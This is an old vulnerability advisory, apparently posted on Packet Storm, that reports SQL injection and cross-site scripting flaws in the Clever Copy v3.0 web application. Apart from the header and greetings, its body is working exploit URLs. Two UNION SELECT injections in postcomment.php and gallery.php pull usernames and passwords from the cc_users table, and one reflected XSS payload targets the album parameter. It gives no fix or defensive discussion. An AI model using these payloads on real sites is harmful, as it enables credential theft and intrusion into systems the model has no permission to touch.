clevercopy-sqlxss.txt

2008-01-18T00:00:00
ID PACKETSTORM:62746
Type packetstorm
Reporter virangar security team
Modified 2008-01-18T00:00:00

Description

                                        
                                            `   
####################################################################  
# #  
# ...:::::Clever Copy v3.0 Multiple Remote Vulnerabilities::::....#  
# (sql injection/xss) #  
# #  
####################################################################  
  
Virangar Security Team  
  
www.virangar.org  
www.virangar.net  
  
--------  
Discoverd By : virangar security team(hadihadi)  
  
---------------------------------  
special tnx to:MR.nosrati,MR.hesy,satan,Zahra  
& my lovely friend arash from empror team  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal) from emperor team :x  
  
------------------------------------  
vulns are in postcomment.php&gallery.php ;)  
  
  
sql injections:  
http://localhost/cc/postcomment.php?ID='/**/union/**/select/**/1,2,3,4,5,6,concat(char(117,115,101,114,110,97,109,101,61),username),concat(0x70617373776f72643d,password),9,10,11,12,13,14,15,16,17/**/from/**/cc_users/**/where/**/theid=1/*  
http://localhost/cc/gallery.php?album='/**/union/**/select/**/null,password,null,null,username,null,null,null/**/from/**/cc_users/**/where/**/theid=1/*  
########################  
xss:  
http://localhost/cc/gallery.php?album=<script>alert('xss')</script>  
########################  
`